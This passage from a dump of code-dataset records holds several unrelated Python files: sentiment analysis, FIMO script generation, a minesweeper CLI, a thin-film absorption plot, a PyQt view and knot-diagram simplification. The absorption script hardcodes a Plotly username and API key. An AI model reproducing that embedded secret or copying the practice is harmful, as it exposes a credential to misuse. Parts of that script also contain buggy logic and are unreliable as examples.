"src.schema.twitter_schema.twitter_schema", "line_number": 30, "usage_type": "argument"}, {"api_name": "src.preprocess.preprocessor.shape_df", "line_number": 31, "usage_type": "call"}, {"api_name": "src.utils.predager_config.predager_config.exp", "line_number": 36, "usage_type": "attribute"}, {"api_name": "src.utils.predager_config.predager_config", "line_number": 36, "usage_type": "name"}, {"api_name": "src.featurizer.word2vec_featurizer.Word2VecFeaturizer", "line_number": 37, "usage_type": "call"}, {"api_name": "pyspark.ml.evaluation.MulticlassClassificationEvaluator", "line_number": 59, "usage_type": "call"}, {"api_name": "pyspark.ml.evaluation.MulticlassClassificationEvaluator", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "434978939", "text": "import nltk\r\nnltk.download('vader_lexicon')\r\nfrom nltk.sentiment import SentimentIntensityAnalyzer\r\nwith open(\"input.txt\", \"r\") as input:\r\n input = input.readlines()\r\n\r\nformat1_input = []\r\nfor element in input:\r\n format1_input.append(element.strip())\r\n\r\nformat2_input = ' '.join(format1_input)\r\nformat3_input = format2_input.replace('\"', '')\r\nformat4_input = format3_input.replace(\"`\", \"\")\r\nformat5_input = format4_input.replace(\"'\", \"\")\r\nformat6_input = format5_input.replace(\".\", \"\")\r\nformat7_input = format6_input.replace(\"!\", \"\")\r\nformat8_input = format7_input.replace(\"?\", \"\")\r\nsia = SentimentIntensityAnalyzer()\r\nprint(sia.polarity_scores(format8_input))\r\n", "sub_path": "Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 668, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "nltk.download", "line_number": 2, "usage_type": "call"}, {"api_name": "nltk.sentiment.SentimentIntensityAnalyzer", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "48021895", "text": "import sys\nimport argparse\nfrom deeplearning.sequenceOperations import makeSequenceInputArraysFromDifferentialPeaks\n\ndef parseArgument():\n\t# Parse the input\n\tparser = argparse.ArgumentParser(description=\"Create a script to run FIMO on a list of pos. and neg. sets from DESeq2 results\")\n\tparser.add_argument(\"--DESeq2FileNameListFileName\", required=True, help=\"Name of file with list of DESeq2 output files\")\n\tparser.add_argument(\"--genomeFileName\", required=False, \\\n\t\tdefault=\"/mnt/data/annotations/by_organism/mouse/mm10/GRCm38.p4.genome.fa\", \\\n\t\thelp=\"File with genome sequence\")\n\tparser.add_argument(\"--backgroundFileName\", required=False, \\\n\t\tdefault=\"/srv/scratch/imk1/TFBindingPredictionProject/MouseMutantData/indivRep_allPeaks-pr1.IDR0.05.mergedPeaks.meanSummits.txt\", \\\n\t\thelp=\"File with the peaks or peak summits that went into DESeq2\")\n\tparser.add_argument(\"--sequenceLength\", type=int, required=False, default=1000, help=\"Number of bases in each sequence\")\n\tparser.add_argument(\"--chroms\", required=False,\\\n default=[\"chr1\", \"chr10\", \"chr11\", \"chr12\", \"chr13\", \"chr14\", \"chr15\", \"chr16\", \"chr17\", \"chr18\", \"chr19\", \"chr2\", \"chr3\", \\\n\t\t\t\t\"chr4\", \"chr5\", \"chr6\", \"chr7\", \"chr8\", \"chr9\", \"chrX\"], \\\n help=\"Name of chromosomes that will be used for FIMO\")\n\tparser.add_argument(\"--thresh\", type=float, required=False, default=0.001, help=\"Number of bases in each sequence\")\n\tparser.add_argument(\"--FIMOResultsDirNamePrefix\", required=False, \\\n\t\tdefault=\"/srv/scratch/imk1/TFBindingPredictionProject/MouseMutantData/FIMOResultsAll/indivRep_allPeaks-pr1.IDR0.05.ZF\", \\\n\t\thelp=\"Prefix of directory names where FIMO results will be recorded\") \n\tparser.add_argument(\"--FIMOPosDirNameSuffix\", required=False, default=\"vsWT.Pos\", \\\n\t\thelp=\"Suffix for directory with output from FIMO on the positive set\")\n\tparser.add_argument(\"--FIMONegDirNameSuffix\", required=False, default=\"vsWT.Neg\", \\\n help=\"Suffix for directory with output from FIMO on the negative set\")\n\tparser.add_argument(\"--FIMOBackgroundFileName\", required=False, \\\n\t\tdefault=\"/srv/scratch/imk1/TFBindingPredictionProject/MouseMutantData/150721_CTCF_motifs/background.1\",\n\t\thelp=\"Name of file with background for FIMO\")\n\tparser.add_argument(\"--FIMOPssmFileName\", required=False, \\\n\t\tdefault=\"/srv/scratch/imk1/TFBindingPredictionProject/MouseMutantData/150721_CTCF_motifs/PSPMList.txt\",\n\t\thelp=\"Name of file with PSSMs for FIMO\")\n\tparser.add_argument(\"--scriptFileName\", required=True, help=\"Name of file where the script will be written\")\n\toptions = parser.parse_args()\n\treturn options\n\t\ndef makeFIMODifferentialPeakScript(options):\n\t# Create a script to run FIMO on a list of pos. and neg. sets from DESeq2 results\n\tDESeq2FileNameListFile = open(options.DESeq2FileNameListFileName)\n\tscriptFile = open(options.scriptFileName, 'w+')\n\tindex = 0\n\tfor line in DESeq2FileNameListFile:\n\t\t# Iterate through the DESeq2 files and make 2 lines in the script for each, one for the pos. set and one for the neg. set\n\t\tindex = index + 1\n\t\t_, _, positiveFastaFileName, negativeFastaFileName, _, _ = makeSequenceInputArraysFromDifferentialPeaks(line.strip(), \\\n\t\t\toptions.genomeFileName, options.backgroundFileName, (1,4,options.sequenceLength), createOptimalBed=False, \\\n\t\t\tbackgroundSummitPresent=False, backgroundSummitOnly=True, createModelDir=False, chroms=options.chroms, \\\n\t\t\tbigWigFileNames=[], multiMode=False, streamData=False, dataFileName=\"\", RC=True, removeFastas=False, \\\n strictNegativeSet=False, fcCutoff=1, swapLabels=True, useDESeq2OutputFileNameForFastaFileName=True)\n\t\tFIMOPosDirName = options.FIMOResultsDirNamePrefix + str(index) + options.FIMOPosDirNameSuffix\n\t\tFIMONegDirName = options.FIMOResultsDirNamePrefix + str(index) + options.FIMONegDirNameSuffix\n\t\tscriptFile.write(\" \".join([\"fimo --thresh\", str(options.thresh), \"--max-stored-scores 1000000 --o\", FIMOPosDirName, \\\n\t\t\t\"--bgfile\", options.FIMOBackgroundFileName, options.FIMOPssmFileName, positiveFastaFileName]) + \"\\n\")\n\t\tscriptFile.write(\" \".join([\"fimo --thresh\", str(options.thresh), \"--max-stored-scores 1000000 --o\", FIMONegDirName, \\\n\t\t\t\"--bgfile\", options.FIMOBackgroundFileName, options.FIMOPssmFileName, negativeFastaFileName]) + \"\\n\")\n\tDESeq2FileNameListFile.close()\n\tscriptFile.close()\n\nif __name__ == \"__main__\":\n options = parseArgument()\n makeFIMODifferentialPeakScript(options)\n", "sub_path": "makeFIMODifferentialPeakScript.py", "file_name": "makeFIMODifferentialPeakScript.py", "file_ext": "py", "file_size_in_byte": 4409, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "deeplearning.sequenceOperations.makeSequenceInputArraysFromDifferentialPeaks", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "444473439", "text": "import re\nimport sys\n\nimport click\n\nfrom .core import Game, Grid\nfrom .utils import to_number\n\nEASY = 10\nNORMAL = 20\nHARD = 30\n\n\nclass CommandLine:\n def __init__(self, prompt='--> '):\n self.prompt = prompt\n\n def setup_game(self):\n print('Size of grid (in the form x) [7x10]')\n size = re.match(r'(\\d+)x(\\d+)', input(self.prompt) or '7x10')\n\n print('Difficulty of the game (easy, normal or hard) [normal]')\n difficulty = input(self.prompt) or 'normal'\n if difficulty == 'easy':\n bomb_percentage = EASY\n elif difficulty == 'hard':\n bomb_percentage = HARD\n else:\n bomb_percentage = NORMAL\n\n grid = Grid(int(size.group(1)), int(size.group(2)))\n self.game = Game(grid, bomb_percentage)\n self.game.init()\n\n @staticmethod\n def _process_input(move):\n raw_x = ''.join([char for char in move if char.isalpha()])\n raw_y = ''.join([char for char in move if char.isdigit()])\n if not raw_y:\n raise ValueError(\"A number is expected\")\n\n return to_number(raw_x), int(raw_y) - 1\n\n def print_help(self):\n help = (\"To select a cell, type the cell's position in the form 'a3' \"\n \"or '8h'.\\n\"\n \"To flag a cell, type 'flag ' or 'unflag' to \"\n \"unflag a cell.\\n\"\n \"To get the rules, type 'rules'.\\n\"\n \"Type quit (or exit) to quit the game.\\n\")\n print(help)\n\n def run(self):\n # TODO: clean up this mess\n print(self.game.grid, end='\\n\\n')\n print(\"What's your next move? (h for help)\")\n nb_cell_total = self.game.grid.nb_cols * self.game.grid.nb_rows\n\n while True:\n user_input = input(self.prompt)\n if user_input in ('h', 'help'):\n self.print_help()\n continue\n elif user_input in ('quit', 'exit'):\n sys.exit()\n else:\n try:\n x, y = self._process_input(user_input)\n cell = self.game.grid[x][y]\n except ValueError as e:\n print(e.args[0])\n continue\n\n if cell.is_bomb:\n for bomb in self.game.bombs:\n self.game.reveal(bomb)\n return False\n elif cell.value == 0:\n self.game.propagate(cell)\n\n self.game.reveal(self.game.grid[x][y])\n nb_revealed_cells = len(self.game.revealed_cells)\n if len(self.game.bombs) + nb_revealed_cells == nb_cell_total:\n for row in self.game.grid:\n for cell in row:\n cell.is_revealed = True\n if cell.is_bomb:\n cell.is_flagged = True\n\n return True\n\n print(self.game.grid, end='\\n\\n')\n print(\"What's your next move? (h for help)\")\n\n\n@click.command()\n@click.option('--graphic', '-g', is_flag=True,\n help='Run the game in terminal graphic mode')\ndef main(graphic):\n if graphic:\n print('Not implemented yet.')\n else:\n game = CommandLine()\n\n game.setup_game()\n has_win = game.run()\n print(game.game.grid, end='\\n\\n')\n if has_win:\n print('You won!')\n else:\n print('Meh, you could have done better...')\n\n return 0\n", "sub_path": "hersweeper/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 3496, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.match", "line_number": 20, "usage_type": "call"}, {"api_name": "core.Grid", "line_number": 31, "usage_type": "call"}, {"api_name": "core.Game", "line_number": 32, "usage_type": "call"}, {"api_name": "utils.to_number", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "click.command", "line_number": 96, "usage_type": "call"}, {"api_name": "click.option", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "26389480", "text": "from numpy import cos, inf, zeros, array, exp, conj, nan, isnan, pi, sin\n\nimport numpy as np\nimport pandas as pd\nimport time\n\nstart_time = time.time()\n\ncos_theta0 = 1\n# at first set theta1 to 0\ncos_theta1 = 1\n# when theta1 is 0, then so too is theta1\ncos_theta2 = 1\n# when theta1 is 0, then so too is theta2\nn_0 = 1\n# for air the refractive index is ~1\n\n# refractive index of Cu\nn_2 = 0.637\n\nprint(n_2)\n\n# we want n to vary between 0 and 3 with a step of 0.1\nsteps = int(3/0.1) + 1\nn = np.empty((steps))\nfiller = np.arange(0,3.1,0.1)\nindex_n = np.arange(n.size)\nnp.put(n,index_n,filler)\n\n# we want k to vary between 0 and 3 with a step of 0.1\nk = np.empty((steps))\nindex_k = np.arange(k.size)\nnp.put(k,index_k,filler)\n\nn = np.array(n)\nk = np.array(k).reshape((-1, 1))\nn_com = n + k.repeat(len(n), 1) * 1j\n\nprint ( \"time\", time.time() - start_time)\n\nr_01 = (cos_theta0 - n_com*cos_theta1)/(cos_theta0 + n_com*cos_theta1)\nt_01 = (2*cos_theta0)/(cos_theta0 + n_com*cos_theta1)\n\n# print(r_01)\n# print(t_01)\n\nr_12 = (n_com*cos_theta1 - n_2*cos_theta2)/(n_com*cos_theta1 + n_2*cos_theta2)\nt_12 = (2*n_com*cos_theta1)/(n_com*cos_theta1 + n_2*cos_theta2)\n\n# print(r_12)\n# print(t_12)\n\nl = [300, 500, 700, 900, 1100, 1300, 1500, 1700] # in units nm\nd = 200 # in units nm\n# creating an empty array\nbeta_mat = []\n\nfor j in n_com:\n temp = []\n for q in range(0, len(l)):\n beta = ((2*np.pi)/l[q])*n_com*d*cos_theta1\n temp.append(beta)\n #there are now 155 things in beta_mat (i.e. 31*5)\nbeta_mat = np.array(temp)\n# this bit of code kinda works, but only give final value l=1000 nm\nz = 0 + 1j\n\n\nblock = np.exp(2*z*beta_mat)\n # double check whether this is e^+ or e^-\n # this is going to be 155 values long, sorry luka not a super neat array of arrays but will still work\n\nfor i in r_01, r_12, block:\n for j in i:\n r_film = (r_01 + (r_12*block))/(1 + r_01*r_12*block)\n # print r_film\n\nprint ( \"time 2\", time.time() - start_time)\n# find r_film for all value of n contained in the array\n\nfor i in t_01, t_12, block:\n for j in i:\n t_film = (t_01*t_12*block)/(1 + r_01*r_12*block)\n\n# find the absolute value of this and then square it\nABS_R = np.absolute(r_film)\n# print(ABS_R)\nR = np.power(ABS_R,2)\n# find the value of R which is equal to square of absolute value of r\n\nABS_T = np.absolute(t_film)\n# print(ABS_T)\nT = n_2*np.power(ABS_T,2)\n# find the value of T which is equal to square of absolute value of t\n\nA = 1 - T - R\n\nWeighted_Abs = [0.0280, 0.1950, 0.2026, 0.1674, 0.1343, 0.1099, 0.0918, 0.0711]\n\n# weighting with respect to the number of electrons in solar spectrum for each wavelength\nfor i in range(0,len(l)):\n A_final = ( Weighted_Abs[i]* A[i])/ Weighted_Abs[i]\n\nprint ( \"time 3\", time.time() - start_time)\n\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport plotly\n# imports for Plotly\n\nplotly.tools.set_credentials_file(username='luka.j.v', api_key='K1pamGZFvMc64DABuoro')\n# username and api_key to host Plotly plots in my account\n\nprint ( \"time 4\", time.time() - start_time)\n\n# Contour plot of Absorption data for Copper\ncontour = [\n go.Contour(\n z=A_final,\n x=n,\n y=k,\n colorscale = [[0, 'rgb(255, 145, 97)'], [1, 'rgb(116, 11, 124)']],\n contours = dict(\n start = 0,\n end = 1,\n showlabels = True\n ),\n\n )\n]\n\ncontour_layout = go.Layout(\n title='Cu Absorption Contour Plot (Weighted over Solar Spectrum)',\n height = 800,\n width = 800,\n xaxis = dict(\n title = ' n values',\n titlefont =dict(\n size=24,\n )\n ),\n yaxis = dict(\n title = ' k values',\n titlefont =dict(\n size=24,\n )\n)\n)\nfig = go.Figure(data = contour, layout = contour_layout)\n\npy.iplot(fig, filename='Cu Absorption Contour (Weighted)')\n", "sub_path": "Abs_Cu_Wieghted.py", "file_name": "Abs_Cu_Wieghted.py", "file_ext": "py", "file_size_in_byte": 3843, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "time.time", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.put", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.put", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 69, "usage_type": "call"}, {"api_name": "time.time", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 104, "usage_type": "call"}, {"api_name": "plotly.tools.set_credentials_file", "line_number": 111, "usage_type": "call"}, {"api_name": "plotly.tools", "line_number": 111, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 114, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Contour", "line_number": 118, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 118, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 132, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 132, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 149, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 149, "usage_type": "name"}, {"api_name": "plotly.plotly.iplot", "line_number": 151, "usage_type": "call"}, {"api_name": "plotly.plotly", "line_number": 151, "usage_type": "name"}]} +{"seq_id": "5704487", "text": "import sys\nimport os\nimport yaml\nimport asyncio\nimport settings\nfrom apps.consts.const import undefined\nfrom apps.System.utils.Organization import Organization\nfrom apps.System.utils.User import User\n\n\nasync def init_system():\n with open(settings.INIT_SETTINGS_FILE, \"rb\") as file:\n organization_list = yaml.load(file).get(\"organization\")\n user_list = yaml.load(file).get(\"user\")\n\n org_dict = {}\n for organization in organization_list:\n org = await Organization.create(\n code=organization.get(\"code\", undefined),\n name=organization.get(\"name\", undefined),\n phone=organization.get(\"phone\", undefined),\n )\n org_dict[organization.get(\"code\", undefined)] = org.oid\n\n for user in user_list:\n User.create(\n org_id=org_dict.get(user.get('org_id').get('value', undefined), undefined),\n username=user.get('username', undefined),\n nickname=user.get('nickname', undefined),\n password=user.get('password', undefined),\n key=user.get('key', undefined),\n )\n\n\nasync def main():\n await init_system()\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n", "sub_path": "init/init_system.py", "file_name": "init_system.py", "file_ext": "py", "file_size_in_byte": 1236, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "settings.INIT_SETTINGS_FILE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 13, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 14, "usage_type": "call"}, {"api_name": "apps.System.utils.Organization.Organization.create", "line_number": 18, "usage_type": "call"}, {"api_name": "apps.System.utils.Organization.Organization", "line_number": 18, "usage_type": "name"}, {"api_name": "apps.consts.const.undefined", "line_number": 19, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 20, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 21, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 23, "usage_type": "argument"}, {"api_name": "apps.System.utils.User.User.create", "line_number": 26, "usage_type": "call"}, {"api_name": "apps.System.utils.User.User", "line_number": 26, "usage_type": "name"}, {"api_name": "apps.consts.const.undefined", "line_number": 27, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 28, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 29, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 30, "usage_type": "argument"}, {"api_name": "apps.consts.const.undefined", "line_number": 31, "usage_type": "argument"}, {"api_name": "asyncio.get_event_loop", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "544103066", "text": "from PyQt5.QtCore import QRectF, pyqtSignal, QRect\nfrom PyQt5.QtGui import QWheelEvent, QMouseEvent\nfrom PyQt5.QtWidgets import QGraphicsView, QToolTip\n\nfrom urh.ui.GridScene import GridScene\nfrom urh.util.Formatter import Formatter\n\n\nclass LiveGraphicView(QGraphicsView):\n zoomed = pyqtSignal(float)\n freq_clicked = pyqtSignal(float)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.min_width = 100\n self.max_width = \"auto\"\n self.capturing_data = True\n\n def wheelEvent(self, event: QWheelEvent):\n if self.capturing_data:\n return\n\n delta = event.angleDelta().y()\n zoom_factor = 1.001 ** delta\n p0scene = self.mapToScene(event.pos())\n w = self.view_rect().width()\n zooming_in = zoom_factor > 1\n if zooming_in and w / zoom_factor < self.min_width:\n return\n\n max_width = self.max_width\n if self.max_width == \"auto\":\n max_width = self.sceneRect().width()\n if not zooming_in and w / zoom_factor > max_width:\n self.update()\n return\n\n self.scale(zoom_factor, 1)\n p1mouse = self.mapFromScene(p0scene)\n move = p1mouse - event.pos()\n self.horizontalScrollBar().setValue(move.x() + self.horizontalScrollBar().value())\n self.zoomed.emit(zoom_factor)\n\n def mouseMoveEvent(self, event: QMouseEvent):\n if isinstance(self.scene(), GridScene):\n freq = self.scene().get_freq_for_pos(int(self.mapToScene(event.pos()).x()))\n if freq is not None:\n QToolTip.showText(self.mapToGlobal(event.pos()), \"Tune to:\"+Formatter.big_value_with_suffix(freq), None, QRect(), 10000)\n\n def mousePressEvent(self, event: QMouseEvent):\n if isinstance(self.scene(), GridScene):\n freq = self.scene().get_freq_for_pos(int(self.mapToScene(event.pos()).x()))\n if freq is not None:\n self.freq_clicked.emit(freq)\n\n def update(self, *__args):\n super().update(*__args)\n\n yscale = self.transform().m22()\n self.resetTransform()\n self.fitInView(self.sceneRect())\n if yscale != 1.0:\n self.scale(1, yscale / self.transform().m22()) # Restore YScale\n\n self.horizontalScrollBar().blockSignals(False)\n\n def view_rect(self) -> QRectF:\n return self.mapToScene(self.rect()).boundingRect()\n", "sub_path": "src/urh/ui/views/LiveGraphicView.py", "file_name": "LiveGraphicView.py", "file_ext": "py", "file_size_in_byte": 2409, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PyQt5.QtWidgets.QGraphicsView", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 10, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 11, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QWheelEvent", "line_number": 19, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QMouseEvent", "line_number": 44, "usage_type": "name"}, {"api_name": "urh.ui.GridScene.GridScene", "line_number": 45, "usage_type": "argument"}, {"api_name": "PyQt5.QtWidgets.QToolTip.showText", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QToolTip", "line_number": 48, "usage_type": "name"}, {"api_name": "urh.util.Formatter.Formatter.big_value_with_suffix", "line_number": 48, "usage_type": "call"}, {"api_name": "urh.util.Formatter.Formatter", "line_number": 48, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QMouseEvent", "line_number": 50, "usage_type": "name"}, {"api_name": "urh.ui.GridScene.GridScene", "line_number": 51, "usage_type": "argument"}, {"api_name": "PyQt5.QtCore.QRectF", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "409531814", "text": "# coding=utf-8\nfrom faker import Faker\nimport json\n\nfk = Faker()\n\n\ndef user():\n return {\n 'name': fk.name(),\n 'address': fk.address(),\n 'description': fk.text()\n }\n\n\nprint(json.dumps([user() for x in range(100)]))\n", "sub_path": "test_/fake_date.py", "file_name": "fake_date.py", "file_ext": "py", "file_size_in_byte": 241, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "faker.Faker", "line_number": 5, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "7194971", "text": "\"\"\"\nSimplifying link diagrams.\n\nImportant notes:\n\n* The link diagram is modified in place. All the relavent parts of the\ndata structure are updated at each step. \n\n* Unknot components which are also unlinked may be silently discarded.\n\"\"\"\n\nfrom .links import Link, Strand, Crossing\nfrom .. import graphs\nimport random\nimport networkx as nx\n\ndef remove_crossings(link, eliminate):\n \"\"\"\n Deletes the given crossings. Assumes that they have already been\n disconnected from the rest of the link, so this just updates\n link.crossings and link.link_components.\n \"\"\"\n if len(eliminate):\n for C in eliminate:\n link.crossings.remove(C)\n new_components = []\n for component in link.link_components:\n for C in eliminate:\n for cep in C.entry_points():\n try:\n component.remove(cep)\n except ValueError:\n pass\n if len(component):\n new_components.append(component)\n link.link_components = new_components\n \ndef reidemeister_I(link, C):\n \"\"\"\n Does a type-1 simplification on the given crossing C if possible.\n\n Returns the pair: {crossings eliminated}, {crossings changed}\n \"\"\"\n elim, changed = set(), set()\n for i in range(4):\n if C.adjacent[i] == (C, (i+1)%4):\n (A, a), (B, b) = C.adjacent[i+2], C.adjacent[i+3]\n elim = set([C])\n if C != A:\n A[a] = B[b]\n changed = set([A, B])\n\n remove_crossings(link, elim)\n return elim, changed\n \n\ndef reidemeister_I_and_II(link, A):\n \"\"\"\n Does a type-1 or type-2 simplification at the given crossing A if\n possible.\n\n Returns the pair: {crossings eliminated}, {crossings changed}\n \"\"\"\n eliminated, changed = reidemeister_I(link, A)\n if not eliminated:\n for a in range(4):\n (B, b), (C, c) = A.adjacent[a], A.adjacent[a+1]\n if B == C and (b-1) % 4 == c and (a+b) % 2 == 0:\n eliminated, changed = reidemeister_I(link, B)\n if eliminated:\n break\n else:\n W, w = A.adjacent[a+2]\n X, x = A.adjacent[a+3]\n Y, y = B.adjacent[b+1]\n Z, z = B.adjacent[b+2]\n eliminated = set([A, B])\n if W != B:\n W[w] = Z[z]\n changed.update(set([W, Z]))\n if X != B:\n X[x] = Y[y]\n changed.update(set([X, Y]))\n remove_crossings(link, eliminated)\n break\n\n return eliminated, changed\n\ndef basic_simplify(link):\n \"\"\"\n Do Reidemeister I and II moves until none are possible.\n \"\"\"\n to_visit, eliminated = set(link.crossings), set()\n while to_visit:\n crossing = to_visit.pop()\n elim, changed = reidemeister_I_and_II(link, crossing)\n assert not elim.intersection(changed)\n eliminated.update(elim)\n to_visit.difference_update(elim)\n to_visit.update(changed)\n\n success = len(eliminated) > 0\n\n # Redo the strand labels (used for DT codes)\n if success:\n component_starts = []\n for component in link.link_components:\n a, b = component[:2]\n if a.strand_label() % 2 == 0:\n component_starts.append(a)\n else:\n component_starts.append(b)\n link._build_components(component_starts)\n return success\n\ndef possible_type_III_moves(link):\n \"\"\"\n Returns all triples of crossings where a type III move is possible.\n\n In this example, one type III move is forbidden since a crossing\n repeats twice.\n \n >>> L = Link([(2,1,3,2),(3,8,4,1),(4,6,5,5),(6,8,7,7)])\n >>> len(possible_type_III_moves(L))\n 1\n \"\"\"\n ans = []\n for face in link.faces():\n if len(face) == 3:\n if sum(ce.entry_point % 2 for ce in face) in [1, 2]:\n while(face[1][1]% 2 != 0 or face[2][1]% 2 != 1): # renumber face_list\n face = [face[1], face[2], face[0]]\n if len(set([e.crossing for e in face])) == 3: # No repeated crossings\n ans.append(face)\n return ans\n\ndef insert_strand(X, x):\n Y, y = X.adjacent[x]\n S = Strand()\n S[0], S[1] = X[x], Y[y]\n return S\n\ndef reidemeister_III(link, triple):\n \"\"\"\n Performs the given type III move. Modifies the given link but doesn't\n update its lists of link components.\n \"\"\"\n A, B, C = [t.crossing for t in triple]\n a, b, c = [t.entry_point for t in triple]\n # We insert Strands around the border of the triple to make the code more\n # transparent and eliminate some special cases.\n old_border = [(C, c-1), (C, c-2), (A, a-1), (A, a-2), (B, b-1), (B, b-2)]\n border_strands = [insert_strand(*P) for P in old_border]\n new_boarder = [(A,a), (B, b+1), (B, b), (C, c+1), (C, c), (A, a+1)]\n for i, (X,x) in enumerate(new_boarder):\n X[x] = border_strands[i][0]\n A[a-1], B[b-1], C[c-1] = B[b+2], C[c+2], A[a+2]\n [S.fuse() for S in border_strands]\n\ndef simplify_via_level_type_III(link, max_consecutive_failures=100):\n \"\"\"\n Applies a series of type III moves to the link, simplifying it via type\n I and II moves whenever possible.\n \"\"\"\n failures, success = 0, False\n if basic_simplify(link):\n success = True\n while failures < max_consecutive_failures:\n poss_moves = possible_type_III_moves(link)\n if len(poss_moves) == 0:\n break\n reidemeister_III(link, random.choice(poss_moves))\n if basic_simplify(link):\n failures = 0\n success = True\n else:\n failures += 1\n\n link._build_components()\n return success\n\ndef common_element(X, Y):\n return list(set(X) & set(Y))[0]\n\nclass Face(tuple):\n \"\"\"\n A complementary region of the link diagram.\n \"\"\"\n def __new__(cls, edges, label=None):\n ans = tuple.__new__(cls, edges)\n ans.label = label\n return ans\n\n def __repr__(self):\n return \"\" % self.label\n\nclass DualGraphOfFaces(graphs.Graph):\n \"\"\"\n The dual graph to a link diagram D, whose vertices correspond to\n complementary regions (faces) of D and whose edges are dual to the\n edges of D.\n \"\"\"\n def __init__(self, link):\n graphs.Graph.__init__(self)\n faces = [Face(face, i) for i, face in enumerate(link.faces())]\n self.edge_to_face = to_face = {}\n for face in faces:\n for edge in face:\n to_face[edge] = face\n\n for edge, face in to_face.iteritems():\n neighbor = to_face[edge.opposite()]\n if face.label < neighbor.label:\n dual_edge = self.add_edge(face, neighbor)\n dual_edge.interface = (edge, edge.opposite())\n dual_edge.label= len(self.edges) - 1\n\n #assert self.is_planar()\n\n def two_cycles(self):\n \"\"\"\n Finds all two cycles and returns them as a pair of CrossingStrands which\n are dual to the edges in the cycle. The crossing strands are\n oriented consistently with respect to one of the faces which a\n vertex for the cycle.\n \"\"\"\n cycles = []\n for face0 in self.vertices:\n for dual_edge0 in self.incident(face0):\n face1 = dual_edge0(face0) \n if face0.label < face1.label:\n for dual_edge1 in self.incident(face1):\n if dual_edge0.label < dual_edge1.label and dual_edge1(face1) == face0:\n cycles.append( (common_element(face0, dual_edge0.interface),\n common_element(face0, dual_edge1.interface)))\n return cycles\n \ndef deconnect_sum(link):\n \"\"\"\n Warning: Destroys the original link.\n \"\"\"\n for cs0, cs1 in DualGraphOfFaces(link).two_cycles():\n A, a = cs0.opposite()\n B, b = cs0\n C, c = cs1.opposite()\n D, d = cs1\n A[a] = D[d]\n B[b] = C[c]\n link._build_components()\n return link.split_link_diagram(destroy_original=True)\n \n \ndef strand_pickup(link,overcrossingstrand):\n \"\"\"\n Simplifies link by optimizing the path of the longest sequence of overcrossings.\n Returns a new link and the number of crossings removed.\n \"\"\"\n for overcross in 